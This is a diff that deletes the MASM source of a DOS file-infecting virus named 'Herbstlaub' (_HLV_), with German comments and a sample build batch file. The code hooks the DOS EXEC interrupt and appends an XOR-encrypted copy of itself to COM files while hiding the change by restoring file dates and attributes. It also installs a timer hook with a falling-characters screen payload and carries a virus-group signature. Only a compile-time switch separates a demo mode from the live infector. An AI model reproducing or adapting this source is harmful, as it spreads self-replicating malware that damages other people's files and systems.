Virus_fun ; - XOR DI,DI ; - XOR SI,SI ; - MSDOS ; - CMP DI,Virus_sig ; - JNZ XI_007 ; -XI_006: STI ; - MOV_S ES,DS ; - MOV AX,CS:[BX+Initial_AX] ; - JMP DWORD PTR CS:[BX+Disp_to_com_1] ; -XI_007: PUSH BX ; - MOV AX,MS_GetInt * 100 + DOS ; - MSDOS ; - MOV AX,BX ; - POP BX ; - MOV CS:[BX+Org_int_21s],AX ; - MOV CS:[BX+Org_int_21s + 2],ES ;------------; - MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; - MOV BP,CS ;------------; - DEC BP ; - MOV ES,BP ; - MOV SI,CS:[PSPCurCom] ; - MOV ES:[MemCBowned],SI ; - MOV DX,ES:[MemCBsize] ; - MOV ES:[MemCBsize],AX ; - MOV ES:[MemCBsig],'M' ; - SUB DX,AX ; - DEC DX ; - INC BP ; - ADD BP,AX ; - INC BP ; - MOV ES,BP ; - PUSH BX ; - MOV AH,MS_SetPSP ; - MOV BX,BP ; - MSDOS ; - POP BX ; - XOR DI,DI ; - MOV_S SS,ES ; - PUSH DI ; - LEA DI,[BX+XR_010] ; - MOV SI,DI ; - MOV CX,OFFSET EOFC ; - STD ; - REPZ MOVSB ; - PUSH ES ; - LEA CX,[BX+XR_006] ; - PUSH CX ; - RETF ; -XI_008 LABEL NEAR ; -XR_006 EQU OFFSET XI_008 + FIRSTBASE ; - MOV CS:[BX+Disp_to_com_2],CS ; - LEA CX,[BX+Crypt2] ; - REPZ MOVSB ; - MOV CS:[PSP_SegJFB],CS ; - DEC BP ; - MOV ES,BP ; - MOV ES:[MemCBsize],DX ; - MOV ES:[MemCBsig],'Z' ; - MOV ES:[MemCBowned],CS ; - INC BP ; - MOV ES,BP ; - MOV_S ES,DS ; - MOV_S DS,CS ; - LEA SI,[BX+Crypt2] ; - MOV DI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - PUSH ES ; - LEA AX,[XR_007] ; - PUSH AX ; - RETF ; -XI_009 LABEL NEAR ; -XR_007 EQU XI_009 + PSPsize ; - MOV CS:[PSPEnv],NoEnv ; - MOV CS:[PSPCurCom],CS ; - PUSH DS ; - LEA DX,[XR_008] ; - MOV_S DS,CS ; - MOV AX,MS_SetInt * 100 + DOS ; - MSDOS ; - POP DS ; - MOV AH,MS_SetDTA ; - MOV DX,DTA_in_PSP ; - MSDOS ; - SAVE DS,ES,SI,DI,CX ; - MOV_S ES,CS ; - MOV CX,BIOSDATASEG ; - MOV DS,CX ; - MOV DI,OFFSET FirstRandom ; - MOV SI,OFFSET B_TIMERVAR ; - MOV CL,8 ; - CLD ; - REPZ MOVSW ; - REST CX,DI,SI,ES,DS ; - ; -IF SWITCHABLE ; - ; - PUSH DS ; - MOV AX,MS_GetInt * 100 + DOS_multi ; - MSDOS ; - MOV CS:[Org_Int_2F],BX ; - MOV CS:[Org_Int_2F + 2],ES ; - MOV AX,MS_SetInt * 100 + DOS_multi ; - MOV DX,offset Int_2F_ISR ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; - ; -ENDIF ; - ; - OR CS:[ISR_Flags],MASK ExtCom ; - MOV AH,MS_GetDateTime ; - MSDOS ; - CMP CX,YEAR ; - JZ XI_010 ; - JMP SHORT XI_011 ; -XI_010: CMP DH,MONTH ; - JB XI_011 ; - AND CS:[ISR_Flags],NOT MASK ExtCom ; -XI_011: MOV AX,1518 ; - CALL Random ; - INC AX ; - MOV CS:[XR_002],AX ; - MOV CS:[XR_003],AX ; - MOV CS:[XR_004],1 ; - MOV AX,MS_GetInt * 100 + TimerInt ; - MSDOS ; - MOV CS:[Org_Int_1C],BX ; - MOV CS:[Org_Int_1C + 2],ES ; - PUSH DS ; - MOV AX,MS_SetInt * 100 + TimerInt ; - MOV DX,OFFSET XR_009 ; - MOV_S DS,CS ; - MSDOS ; - POP DS ; -XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; - JMP XI_006 ; - comment # -Ŀ - Neue Interrupt 21(h) Behandlungsroutine ( verndert Exec - Funktion ). - - # ; -XI_013 LABEL NEAR ; -XR_008 EQU XI_013 + PSPsize ; - CMP AH,MS_Exec ; - JZ XI_016 ; -XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; -XI_015: MOV DI,Virus_Sig ; - LES AX,CS:DWORD PTR [Org_Int_21t] ; - MOV DX,CS ; - IRET ; -XI_016: CMP AL,Virus_fun ; - JZ XI_015 ; - CMP AL,MS_Exec_SF0 ; - JNZ XI_014 ; - SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; - MOV CS:[Pathname],DX ; - MOV CS:[Pathname + 2],DS ; - MOV_S ES,CS ; - MOV AX,MS_Open * 100 + Read_Only ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_GetFileDate ; - MSDOS ; - MOV CS:[File_Date],DX ; - MOV CS:[File_Time],CX ; - MOV AH,MS_Read ; - MOV_S DS,CS ; - MOV DX,OFFSET Org1stInstr_t1 ; - MOV CX,3 ; - MSDOS ; - JB XI_018 ; - CMP AX,CX ; - JNZ XI_018 ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - MOV CS:[File_Size_lsb],AX ; - MOV CS:[File_Size_msb],DX ; - MOV AH,MS_Close ; - MSDOS ;---------------; - CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; - JNZ XI_017 ; - JMP XI_025 ; -XI_017: CMP CS:[File_Size_msb],+0 ; - JA XI_018 ; - CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; - JBE XI_019 ; -XI_018: JMP XI_025 ; -XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; - JNZ XI_020 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; - CMP AX,CS:[Org1stInstr_t2] ;---------------; - JZ XI_018 ; - ; -IF DEMO ; -XI_020: CALL DEMO_Infect ; - JMP XI_025 ; - ; -IF2 ;----------------; -%Out ͻ -%Out Demo - Version, -%Out k e i n Virus. -ENDIF ;----------------; -ELSE ; -IFDEF _DANGER ; -XI_020 MOV AX,MS_GetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; - JB XI_018 ; - MOV CS:[File_Attributes],CX ; - XOR CL,Attr_A ; - TEST CL,Attr_ASHR ; - JZ XI_021 ; - MOV AX,MS_SetFileAttr ; - XOR CX,CX ; - MSDOS ; - JB XI_018 ; -XI_021: MOV AX,MS_Open * 100 + Read_Write ; - MSDOS ; - JB XI_018 ; - MOV BX,AX ; - MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - CALL Append_Virus ; - JNB XI_022 ; - MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - MOV CX,CS:[File_Size_msb] ; - MOV DX,CS:[File_Size_lsb] ; - MSDOS ; - MOV AH,MS_Write ; - XOR CX,CX ; - MSDOS ; - JMP SHORT XI_023 ; -XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; - XOR CX,CX ; - XOR DX,DX ; - MSDOS ; - JB XI_023 ; - MOV AX,CS:[File_Size_lsb] ; - ADD AX,-2 ; - MOV CS:[FirstOpCode_2],AX ; - MOV AH,MS_Write ; - MOV DX,OFFSET FirstOpCode_1 ; - MOV CX,3 ; - MSDOS ; -XI_023: MOV AX,MS_SetFileDate ; - MOV DX,CS:[File_Date] ; - MOV CX,CS:[File_Time] ; - MSDOS ; - MOV AH,MS_Close ; - MSDOS ; - MOV CX,CS:[File_Attributes] ; - TEST CL,Attr_SHR ; - JNZ XI_024 ; - TEST CL,Attr_A ; - JNZ XI_025 ; -XI_024: MOV AX,MS_SetFileAttr ; - LDS DX,CS:DWORD PTR [Pathname] ; - MSDOS ; -IF2 ;----------------; -%Out ͻ -%Out KEIN DEMO, -%Out scharfer Virus. -ENDIF ; -ELSE ; - .ERR ; -ENDIF ; -ENDIF ; -IF SWITCHABLE ; -IF2 ; -%Out ͻ -%Out Neuer interner MSDOS Befehl '_HLV_' ! -ENDIF ; -ELSE ; -IF2 ; -%Out ͻ -%Out Kommando '_HLV_' nicht implementiert. -ENDIF ; -ENDIF ; -DISPNUM MACRO nu,nuxx ; -%Out (Monat - Jahr) nu - nuxx -ENDM ; -IF2 ; -%Out Bis zum Jahresende aktiv ab: -.radix 10 ; -DISPNUM %MONTH,%YEAR ; -.radix 16 ; -%Out ͼ -endif ; -XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; - JMP XI_014 ; -IF DEMO ; - ; - comment # -Ŀ - Statt APPEND in der DEMO - Version aufgerufene Prozedur. - - # ; -DEMO_INFECT PROC NEAR ; - push ax ; - push cx ; - in al,61 ; - or al,3 ; - out 61,al ; - mov al,0b6 ; - out 43,al ; - mov cx,0a ; -XI_026: dec cx ; - jz XI_030 ; -XI_027: mov ax,200d ; -XI_028: dec ax ; - cmp ax,100d ; - jz XI_031 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_029: nop ; - loop XI_029 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_028 ; -XI_030: in al,61 ; - and al,0fc ; - out 61,al ; - pop cx ; - pop ax ; - ret ; -XI_031: inc ax ; - cmp ax,600d ; - jz XI_026 ; - push ax ; - out 42,al ; - push cx ; - mov cx,150d ; -XI_032: nop ; - loop XI_032 ; - pop cx ; - mov al,ah ; - out 42,al ; - pop ax ; - jmp XI_031 ; -DEMO_INFECT ENDP ; - ; -ELSE ; - comment # -Ŀ - Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur - - # ; -Append_Virus PROC NEAR ; - SAVE ES,BX ; - MOV AH,MS_AllocMem ;----------; - MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; - MSDOS ;----------; - POP BX ; - JNB XI_034 ; -XI_033: STC ; - POP ES ; - RET ; -XI_034: MOV CS:[Crypt3],EnCrptd ; - MOV ES,AX ; - MOV_S DS,CS ; - XOR DI,DI ; - MOV SI,PSPsize ; - MOV CX,OFFSET EOFC ; - CLD ; - REPZ MOVSB ; - MOV DI,OFFSET XI_003 ; - MOV SI,OFFSET XR_001 ; - ADD SI,[File_Size_lsb] ; - MOV CX,OFFSET EOFC - OFFSET XI_003 ; -XI_035: XOR ES:[DI],SI ; - XOR ES:[DI],CX ; - INC DI ; - INC SI ; - LOOP XI_035 ; - MOV DS,AX ; - MOV AH,MS_Write ; - XOR DX,DX ; - MOV CX,OFFSET EOFC ; - MSDOS ; - SAVE F,AX ; - MOV AH,MS_ReleaseMem ; - MSDOS ; - REST AX,F ; - MOV_S DS,CS ; - JB XI_033 ; - CMP AX,CX ; - JNZ XI_033 ; - POP ES ; - CLC ; - RET ; -Append_Virus ENDP ; - ; -ENDIF ; - comment # -Ŀ - 'Zufallszahlen' - Generator. - - # ; -Random PROC NEAR ; - SAVE DS ; - MOV_S DS,CS ; - SAVE BX,CX,DX,AX ; - MOV CX,7 ; - MOV BX,offset LastRandom ; - PUSH [BX] ; -XI_036: MOV AX,[BX-02] ; - ADC [BX],AX ; - DEC BX ; - DEC BX ; - LOOP XI_036 ; - POP AX ; - ADC [BX],AX ; - MOV DX,[BX] ; - POP AX ; - OR AX,AX ; - JZ XI_037 ; - MUL DX ; -XI_037: MOV AX,DX ; - REST DX,CX,BX,DS ; - RET ; -Random ENDP ; - comment # -Ŀ - Zeichen und Attribut aus Videospeicher auslesen. - - # ; -Load_from_VRAM PROC NEAR ; - SAVE SI,DS,DX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV SI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV DS,[Seg_of_VRAM] ; - JZ XI_038 ; - Wait_HRI_or_VRI ; -XI_038: LODSW ; - STI ; - REST DX,DS,SI ; - RET ; -Load_from_VRAM ENDP ; - comment # -Ŀ - Zeichen und Attribut (AX) in den Videospeicher schreiben. - - # ; -Write_to_VRAM PROC NEAR ; - SAVE DI,ES,DX,BX ; - MOV BX,AX ; - MOV AL,DH ; - MUL [Num_of_Col] ; - MOV DH,0 ; - ADD AX,DX ; - SHL AX,1 ; - ADD AX,[Page_offset] ; - MOV DI,AX ; - TEST [Prevent_Snow?],-1 ; - MOV ES,[Seg_of_VRAM] ; - JZ XI_039 ; - Wait_HRI_or_VRI ; -XI_039: MOV AX,BX ; - STOSB ; - STI ; - REST BX,DX,ES,DI ; - RET ; -Write_to_VRAM ENDP ; - comment # -Ŀ - Bit 0 von Port B des 8255 Chips zurcksetzen (IO-Adresse : &H61 ). - - # ; -Toggle_Speaker PROC NEAR ; - PUSH AX ; - IN AL,PORT_B_8255 ; - XOR AL,02 ; - AND AL,0FE ; - OUT PORT_B_8255,AL ; - POP AX ; - RET ; -Toggle_Speaker ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein nicht darstellbares Zeichen enthlt. - - # ; -Is_it_blank_? PROC NEAR ; - CMP AL,0 ; - JZ XI_040 ; - CMP AL,20 ; - JZ XI_040 ; - CMP AL,-1 ; - JZ XI_040 ; - CLC ; - RET ; -XI_040: STC ; - RET ; -Is_it_blank_? ENDP ; - comment # -Ŀ - CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enthlt. - - # ; -Spec_Graphik? PROC NEAR ; - CMP AL,0B0 ; - JB XI_041 ; - CMP AL,0DF ; - JA XI_041 ; - STC ; - RET ; -XI_041: CLC ; - RET ; -Spec_Graphik? ENDP ; - comment # -Ŀ - Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. - - # ; -GetSysSpeed PROC NEAR ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - STI ; - MOV AX,[B_TIMERVAR] ; -XI_042: CMP AX,[B_TIMERVAR] ; - JZ XI_042 ; - XOR CX,CX ; - MOV AX,[B_TIMERVAR] ; -XI_043: INC CX ; - JZ XI_045 ; - CMP AX,[B_TIMERVAR] ; - JZ XI_043 ; -XI_044: POP DS ; - MOV AX,CX ; - XOR DX,DX ; - MOV CX,0F ; - DIV CX ; - MOV CS:[Speed],AX ; - RET ; -XI_045: DEC CX ; - JMP XI_044 ; -GetSysSpeed ENDP ; - comment # -Ŀ - Verzgern ( Verzgerungszeit ist kaum maschinenabhngig ). - - # ; -Delay PROC NEAR ; - PUSH CX ; -XI_046: PUSH CX ; - MOV CX,[Speed] ; -XI_047: LOOP XI_047 ; - POP CX ; - LOOP XI_046 ; - POP CX ; - RET ; -Delay ENDP ; - comment # -Ŀ - Eine neue Interrupt 1C(h) Behandlungsroutine. - - # ; -XI_048 LABEL NEAR ; -XR_009 EQU XI_048 + PSPsize ;----------; - TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; - JZ XI_049 ;----------; - JMP XI_067 ; -XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; - DEC CS:[XR_002] ; - JZ XI_050 ; - JMP XI_066 ; -XI_050: SAVE DS,ES ; - MOV_S DS,CS ; - MOV_S ES,CS ; - SAVE AX,BX,CX,DX,SI,DI,BP ; - MOV AL,EOI_8259A ; - OUT PORT_B_8259A,AL ; - MOV AX,[XR_003] ; - CMP AX,0438 ; - JNB XI_051 ; - MOV AX,0438 ; -XI_051: CALL Random ; - INC AX ; - MOV [XR_002],AX ; - MOV [XR_003],AX ; - PUSH DS ; - MOV AX,BIOSDATASEG ; - MOV DS,AX ; - MOV AX,[B_VidPage] ; - POP DS ; - MOV [Page_offset],AX ; - MOV [Last_Line],18 ; - MOV DL,-1 ; - MOV AX,1130 ; - MOV BH,0 ; - SAVE ES,BP ; - INT 10 ; - REST BP,ES ; - CMP DL,-1 ; - JZ XI_052 ; - MOV [Last_Line],DL ; -XI_052: CALL GetSysSpeed ; - MOV AH,0F ; - INT 10 ; - MOV [Num_of_Col],AH ; - MOV [Prevent_Snow?],0 ; - MOV [Seg_of_VRAM],MonoBase ; - CMP AL,07 ; - JZ XI_054 ; - JB XI_053 ; - JMP XI_064 ; -XI_053: MOV [Seg_of_VRAM],ColorBase ; - CMP AL,03 ; - JA XI_054 ; - CMP AL,02 ; - JB XI_054 ; - MOV [Prevent_Snow?],01 ; - MOV AL,[Last_Line] ; - INC AL ; - MUL [Num_of_Col] ; - MOV [Num_of_char],AX ; - MOV AX,[XR_004] ; - CMP AX,[Num_of_char] ; - JBE XI_054 ; - MOV AX,[Num_of_char] ; -XI_054: CALL Random ; - INC AX ; - MOV SI,AX ; -XI_055: XOR DI,DI ; -XI_056: INC DI ; - MOV AX,[Num_of_char] ; - SHL AX,1 ; - CMP DI,AX ; - JBE XI_057 ; - JMP XI_064 ; -XI_057: OR [ISR_Flags],MASK Recf_1 ; - MOV AL,[Num_of_Col] ; - MOV AH,0 ; - CALL Random ; - MOV DL,AL ; - MOV AL,[Last_Line] ; - MOV AH,0 ; - CALL Random ; - MOV DH,AL ; - CALL Load_from_VRAM ; - CALL Is_it_blank_? ; - JB XI_056 ; - CALL Spec_Graphik? ; - JB XI_056 ; - MOV [Last_Pair],AX ; - MOV CL,[Last_Line] ; - MOV CH,0 ; -XI_058: INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JB XI_060 ; -XI_059: CALL Spec_Graphik? ; - JB XI_062 ; - INC DH ; - CMP DH,[Last_Line] ; - JA XI_062 ; - CALL Load_from_VRAM ; - CMP AH,[Last_Attr] ; - JNZ XI_062 ; - CALL Is_it_blank_? ; - JNB XI_059 ; - CALL Toggle_Speaker ; - DEC DH ; - CALL Load_from_VRAM ; - MOV [Last_Char],AL ; - INC DH ; -XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; - DEC DH ; - MOV AL,' ' ; - CALL Write_to_VRAM ; - INC DH ; - MOV AL,[Last_Char] ; - CALL Write_to_VRAM ; - JCXZ XI_061 ; - CALL Delay ; - DEC CX ; -XI_061: JMP XI_058 ; -XI_062: TEST [ISR_Flags],MASK Recf_1 ; - JZ XI_063 ; - JMP XI_056 ; -XI_063: CALL Toggle_Speaker ; - DEC SI ; - JZ XI_064 ; - JMP XI_055 ; -XI_064: IN AL,PORT_B_8255 ; - AND AL,0FC ; - OUT PORT_B_8255,AL ; - MOV AX,3 ; - CALL Random ; - INC AX ; - MUL [XR_004] ; - JNB XI_065 ; - MOV AX,-1 ; -XI_065: MOV [XR_004],AX ; - REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; -XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; -XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; - ; -IF SWITCHABLE ; - ; - comment # -Ŀ - Implementierung eines neuen in CMD_2F definierten internen Befehls. - - # ; -XI_068 Label Near ; -Int_2F_ISR EQU XI_068 + PSPsize ; - CMP AH,0AEH ; - JNZ Int_2F_end ; - CMP DX,-1 ; - JNZ Int_2F_end ; - CMP AL,0 ; - JNZ Int_2F_2nd ; - CALL Decode_2F ; - JNZ Int_2F_end ; - DEC AL ; - IRET ; -Int_2F_2nd: CMP AL,1 ; - JNZ Int_2F_end ; - CALL Decode_2F ; - JNZ Int_2F_end ; - SAVE DS,DX,AX ; - MOV_S DS,CS ; - XOR [ISR_Flags],MASK ExtCom ; - MOV DX,OFFSET MSG_ON ; - TEST [ISR_Flags],MASK ExtCom ; - JZ XI_069 ; - MOV DX,OFFSET MSG_OFF ; -XI_069: MOV AH,9 ; - MSDOS ; - REST AX,DX,DS ; - AND BYTE PTR [SI],0 ; - IRET ; -Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; - comment # -Ŀ - berprfen, ob der in CMD_2F definierte Befehl angesprochen wurde. - - # ; -Decode_2F PROC NEAR ; - SAVE SI,DI,ES,CX ; - MOV CX,05 ; - MOV_S ES,CS ; - MOV DI,OFFSET Cmd_2F ; - CLD ; - REPE CMPSW ; - REST CX,ES,DI,SI ; - RET ; -Decode_2F ENDP ; - ; -ENDIF ; - comment # -Ŀ - Okay, das war's. Zum Schlu noch einige Definitionen. - - # ; -EOFC EQU THIS WORD ; -XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; -TEXT ENDS ; -IF2 ;----------------; -%Out -%Out (C) 1990 164A12565AA18213165556D3125C4B962712 ͼ -ENDIF ; -comment # -ͻ - - So knnte ein Batch - Makefile aussehen : - - @cls - @if %1.==. goto nopar - @if not exist %1.asm goto noasm - @ctty nul - @del %1.obj - @del %1.lst - @del %1.crf - @del %1.ref - @del %1.map - @del %1.exe - @del %1.bin - @del _HLV_.COM - @ctty con - @masm /b63 %1,,%1,%1 %2 %3 %4; - @if not exist %1.obj goto masm_err - @link %1,,%1; - @if not exist %1.exe goto link_err - @exe2bin %1; - @if not exist %1.bin goto exe2_err - @cref %1; - @if not exist %1.ref goto cref_err - @echo >> %1.lst - @copy %1.lst+%1.map+%1.ref %1.t > nul - @del %1.lst > nul - @ren %1.t %1.lst > nul - @del %1.obj > nul - @del %1.crf > nul - @del %1.ref > nul - @del %1.map > nul - @del %1.exe > nul - @echo n %1.bin > md.inp - @echo l 11f >> md.inp - @echo a 110 >> md.inp - @echo add cx,20 >> md.inp - @echo. >> md.inp - @echo g =110 113 >> md.inp - @echo f 110 11e 20 >> md.inp - @echo e 110 '%1' >> md.inp - @echo f 100 10f 90 >> md.inp - @echo a 100 >> md.inp - @echo jmp 120 >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo nop >> md.inp - @echo mov ax,4c00 >> md.inp - @echo int 21 >> md.inp - @echo. >> md.inp - @echo n _HLV_.com >> md.inp - @echo w >> md.inp - @echo q >> md.inp - @debug < md.inp > nul - @cls - @echo. - @echo ͻ - @echo - @echo MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt. - @echo - @echo ͼ - @echo. - @goto ende - :nopar - @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! - @echo Syntax : MAKEHLV asmfile [switches] - @goto ende - :noasm - @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! - @goto ende - :masm_err - @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! - @goto ende - :link_err - @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! - @goto ende - :exe2_err - @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! - @goto ende - :cref_err - @echo FEHLER ! %1.REF konnte nicht erstellt werden ! - :ende - -ͼ -# -END - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/CASCSPEC (34).ASM b/c/CASCSPEC (34).ASM deleted file mode 100755 index 4ccbc83..0000000 --- a/c/CASCSPEC (34).ASM +++ /dev/null @@ -1,1183 +0,0 @@ -PAGE 62,132 -TITLE _HLV_ (- Microsoft MASM 5.1 source -) -SUBTTL (C) 1990 164A12565AA18213165556D3125C4B962712 -.RADIX 16 -.LALL - -TRUE EQU 1 -FALSE EQU 0 - -MONTH EQU 9D -YEAR EQU 1991D - -DEMO EQU TRUE - -SWITCHABLE = TRUE -IFDEF _NOSWITCH -SWITCHABLE = FALSE -ENDIF - -comment # -ͻ - - ===================== - H E R B S T L A U B - ===================== - - - SPRACHE: MASM 4.00 (+) [ frhere Versionen brechen z.B. mit - *OUT OF MEMORY* (3.00) ab oder lassen - sogar den PC abstrzen (1.10) ] - - ( Eine als Beispiel gedachte Batchdatei zur Steuerung der bersetzung - ist am Ende dieses Quelltextes als Kommentar hinzugefgt. ) - -ͼ -Ŀ - Whrend der bersetzung zu auszugebende Meldungen, 1. Teil. - -# -IF1 -REPT 50 -%Out -ENDM; -%Out ͻ -%Out -%Out Ŀ -%Out Ĵ H E R B S T L A U B İ -%Out ٰ -%Out -ENDIF -comment # -Ŀ - Einige Assembler - Makros. - -# ; -MSDOS MACRO ; - INT 21 ; - ENDM ; -Wait_HRI_or_VRI MACRO ; - LOCAL _X_1, _X_2, _X_3 ; - MOV DX,03DA ; - CLI ; - _X_1: IN AL,DX ; - TEST AL,08 ; - JNZ _X_3 ; - TEST AL,01 ; - JNZ _X_1 ; - _X_2: IN AL,DX ; - TEST AL,01 ; - JZ _X_2 ; - _X_3 LABEL NEAR ; - ENDM ;------; -SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - PUSHF ; - ELSE ; - PUSH _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ;------; -REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - POPF ; - ELSE ; - POP _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ; -MOV_S MACRO S1,S2 ; - PUSH S2 ; - POP S1 ; - ENDM ; - comment # -Ŀ - Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- - tomatisch durch den Assembler erzeugt. - - # ; -TEXT SEGMENT ; - ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; - comment # -Ŀ - Einige das Verstndnis erleichternde Definitionen. - - # ; -NearJmp EQU 0E9 ; -PORT_B_8259A EQU 20 ; -EOI_8259A EQU 20 ; -PORT_B_8255 EQU 61 ; -FIRSTCONST EQU 0131 ; -FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; -FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; -DeCrptd EQU 0 ;-----; -EnCrptd EQU 1 ; -BIOSDATASEG EQU 040 ; -MonoBase EQU 0B000 ; -ColorBase EQU 0B800 ; -B_VIDPAGE EQU THIS WORD + 04E ; -B_TIMERVAR EQU THIS WORD + 06C ; -TimerInt EQU 1C ; -DOS EQU 21 ; -DOS_multi EQU 2F ; -MS_SetDTA EQU 1A ; - DTA_in_PSP EQU 80 ; -MS_SetInt EQU 25 ; -MS_GetDateTime EQU 2A ; -MS_GetVer EQU 30 ; - DOS_v_02 EQU 2 ; -MS_GetInt EQU 35 ; -MS_Open EQU 3Dh ; - Read_Only EQU 0 ; - Read_Write EQU 2 ; -MS_Close EQU 3E ; -MS_Read EQU 3F ; -MS_Write EQU 40 ; -MS_MoveFP EQU 42 ; - OfsFrmTop EQU 0 ; - OfsFrmEnd EQU 02 ; -MS_GetFileAttr EQU 4300 ; -MS_SetFileAttr EQU 4301 ; - Attr_A EQU 20 ; - Attr_SHR EQU 7 ; - Attr_ASHR EQU Attr_A OR Attr_SHR ; -MS_AllocMem EQU 48 ; -MS_ReleaseMem EQU 49 ; - MemCBsig EQU THIS BYTE + 0 ; - MemCBowned EQU THIS WORD + 1 ; - MemCBsize EQU THIS WORD + 3 ; -MS_Exec EQU 4Bh ; - MS_Exec_SF0 EQU 0 ; - Virus_fun EQU 0ffh ; - Virus_Sig EQU 55AA ; -MS_SetPSP EQU 50 ; - PSPsize EQU 00100 ; - PSPCurCom EQU THIS WORD + 016 ; - PSPEnv EQU THIS WORD + 02C ; - PSP_SegJFB EQU THIS WORD + 036 ; - NoEnv EQU 0 ; -MS_GetFileDate EQU 5700 ; -MS_SetFileDate EQU 5701 ; -PSP_100 EQU THIS WORD + PSPsize ; -PSP_102 EQU THIS BYTE + PSPsize + 2 ; - comment # -Ŀ - Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. - - # ; -Crypt1 DB 0 ; -Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; -Crypt3 EQU Crypt1 + PSPsize ; - comment # -Ŀ - Einsprungstelle, entschlsseln des Virus falls notwendig. - - # ; -XI_000: CLI ; - MOV BP,SP ; - CALL XI_001 ; -XI_001: POP BX ; - SUB BX,FIRSTCONST ; - TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; - JZ XI_003 ; - LEA SI,[BX + XR_000] ; - MOV SP,OFFSET EOFC-OFFSET XI_003 ; -XI_002: XOR [SI],SI ; - XOR [SI],SP ; - INC SI ; - DEC SP ; - JNZ XI_002 ; -XI_003 LABEL NEAR ; - XR_000 EQU OFFSET XI_003 + FIRSTBASE ; - XR_001 EQU XI_003 + PSPsize ; - MOV SP,BP ; - JMP SHORT XI_004 ; - comment # -Ŀ - Datenbereich 2. - - # ; - XD_000 DW PSPsize ; -Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; - XD_001 DW 9090 ; -Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; - XD_002 DW 9090 ; -Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; - XD_003 EQU THIS WORD ; - XD_004 EQU THIS BYTE + 2 ; - NOP ; - NOP ; - NOP ; -Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; -Org1stInstr_t1 EQU XD_003 + PSPsize ; -Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; -Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; - XD_005 DW 2 dup ( 9090 ) ; -Org_Int_1C EQU XD_005 + PSPsize ; - XD_006 DW 2 dup ( 9090 ) ; -Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; -Org_Int_21t EQU XD_006 + PSPsize ; - ; -IF SWITCHABLE ; - ; - XD_007 DW 2 dup ( 9090 ) ; -Org_Int_2F EQU XD_007 + PSPsize ; - XD_008 DB 5, "_HLV_ " ; -Cmd_2F EQU XD_008 + 